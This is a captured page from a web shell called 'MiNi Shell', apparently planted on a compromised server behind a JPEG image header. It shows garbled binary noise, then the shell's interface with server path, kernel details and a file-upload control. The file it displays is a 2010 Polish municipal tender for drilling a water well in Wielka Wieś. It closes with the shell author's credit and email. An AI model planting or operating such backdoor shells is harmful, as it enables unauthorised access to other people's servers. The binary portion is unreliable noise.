JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/13266-N-2010.html

<p class="kh_header"><b>Wielka Wieś: Wykonanie otworu poszukiwawczego ( studziennego) w celu ujęcia wód podziemnych z utworów jurajskich na potrzeby północno- zachodniej części Gminy Wielka Wieś w miejscowości Wierzchowie</b><br>
<b>Numer ogłoszenia: 13266 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielka Wieś , ul. Wesoła 48, 32-089 Wielka Wieś, woj. małopolskie, tel. 012 4191704, faks 012 4191705.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielka-wies.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie otworu poszukiwawczego ( studziennego) w celu ujęcia wód podziemnych z utworów jurajskich na potrzeby północno- zachodniej części Gminy Wielka Wieś w miejscowości Wierzchowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie otworu poszukiwawczego ( studziennego) w celu ujęcia wód podziemnych z utworów jurajskich na potrzeby północno- zachodniej części Gminy Wielka Wieś w miejscowości Wierzchowie 
1.Zakres rzeczowy zamówienia obejmuje:
- wycinkę 7 szt. świerków o obwodach: 54,47,69,60,73,25,35 cm - ( 3 szt. fi 10-15 cm oraz 4 szt. fi 16-25 cm)
- wiercenie otworów  kat. I-III					10 mb
- wiercenie otworów kat. IV-Vi 					60 mb
- montaż i zagospodarowanie placu wierceń				1 szt.
- demontaż zestawu i likwidacja placu				1 szt.
- zamykanie wód przez iłowanie					15 mb
-zabudowanie filtra studziennego 					80 mb
- pompowanie próbne i oczyszczające				144 godzin
- przerwy w ruchu							84 godziny
- montaż i demontaż rurociągu					30 mb
- nadzór geologiczny i dokumentacja w tym dokumentacja hydrogeologiczna i 
operat wodno-prawny
- montaż obudowy studni z kręgów Fi 200 mm wraz z obsypaniem i schodami 
- montaż pompy głębinowej i okablowania
- wygrodzenie strefy bezpośredniej ujęcia 16 x 16 m z siatki 1,5 m na podmurówce + brama wjazdowa szer. 3 m 
Szczegółowy zakres robót został ujęty w przedmiarze robót, który jest załącznikiem do SIWZ. 
Roboty należy wykonać zgodnie z projektem prac geologicznych oraz zaleceniami zawartymi w decyzji zatwierdzającej ten projekt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.22.20-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy wymaga wadium w kwocie 3.000,00 zł ( trzy tysiące złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do przetargu zostaną zakwalifikowani Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy w tym w szczególności spełniają warunek 

1/ posiadania wiedzy i doświadczenia tj. wykonali w okresie ostatnich pięciu   lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 1  robotą budowlaną odpowiadającą swoim rodzajem i wartością robocie stanowiącej  przedmiot zamówienia. Za roboty tego samego rodzaju Zamawiający uzna budowę studni wierconej.

2/dysponowania  personelem tj. mieć w dyspozycji  kierownika budowy z uprawnieniami Urzędu Górniczego, średniego dozoru.

3/dysponowania potencjałem technicznym : mieć w dyspozycji sprzęt niezbędny  do prawidłowego wykonania przedmiotu zamówienia Wymagane minimum  potencjału technicznego to : urządzenie wiertnicze  o minimalnym przelocie wiercenia  do 100m. 

4/. Zamówienie może być udzielone wyłącznie Wykonawcy który nie podlega wykluczeniu z postępowania na podstawie art. 24ust.1 i 2 ustawy .

2.	Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków zostanie dokonane według formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach przedstawionych w ofercie.

3	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponowała zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4	Jeżeli Wykonawca wykazując spełnienie warunków o których mowa w Rozdz. VII  ust.1 pkt 1-3 polega na zasobach innych podmiotów na zasadach określonych w ust.3 a podmioty te będą brały udział w  realizacji części zamówienia Wykonawca zobowiązany będzie do przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w Rozdz. VIII ust. 2 pkt 2.1 i 2.2 niniejszej siwz..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na potwierdzenie spełnienia warunków, o których mowa w art. 22 ust 1, Wykonawcy winni przedstawić następujące dokumenty  i oświadczenia: 

1.1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1 pkt. 1-4 ustawy Prawo zamówień publicznych  zgodnie z treścią załącznika nr 2 do niniejszej specyfikacji.

1.2.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  - na formularzu zgodnym z treścią załącznika Nr 4 do niniejszej specyfikacji. 
Wymagane minimum : 1  kierownik budowy z uprawnieniami Urzędu Górniczego, średniego dozoru.

1.3.	Oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 

1.4.	Wykaz wykonanych robót   w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich pięciu  lat  przed dniem składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości  daty i miejsca  wykonania,   zgodnie z treścią załącznika nr 5 - Wykaz robót , do  niniejszej SIWZ. Wymagane minimum to  1 robota budowlana odpowiadająca swoim rodzajem i wartością robocie stanowiącej  przedmiot zamówienia. Za roboty tego samego rodzaju Zamawiający uzna budowę studni wierconej.

1.5	Dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

1.6	Wykaz narzędzi, wyposażenia zakładu i  urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami zgodnie z treścią załącznika nr 6  do niniejszej siwz . Wymagane minimum potencjału technicznego to: urządzenie wiertnicze  o minimalnym przelocie wiercenia  do 100m. 

1.7.	Pisemne zobowiązanie innych podmiotów zgodnie z art.26 ust 2b ustawy do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - jeżeli dotyczy

2. Na potwierdzenie spełnienia warunków, o których mowa w art. 24 , Wykonawcy winni przedstawić następujące dokumenty  i oświadczenia: 

2.1 	Oświadczenia o braku podstaw do wykluczenia na podstawie art. 24 ust.1i 2  ustawy wypełnione i podpisane odpowiednio przez osoby upoważnione - Załącznik nr 3 do niniejszej siwz

2.2	Oświadczenie lub dokument wskazujący na brak podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy Prawo zamówień publicznych. 
2.2.1	Aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 

2.2.2.	W stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust.1 pkt 2 ustawy- Załącznik nr 3A do niniejszej siwz. 

2.3.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,  wystawione nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert.

2.4.		Aktualne zaświadczenie właściwego oddziału ZUS-u lub Kasy Rolniczego Ubezpieczenia  Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem  składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wielka-wies.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wielka Wieś, 32-089 Wielka Wieś, ul. Wesoła 48.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2010 godzina 09:30, miejsce: Urząd Gminy Wielka Wieś, 32-089 Wielka Wieś, ul. Wesoła 48, Biuro Obsługi Interesantów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com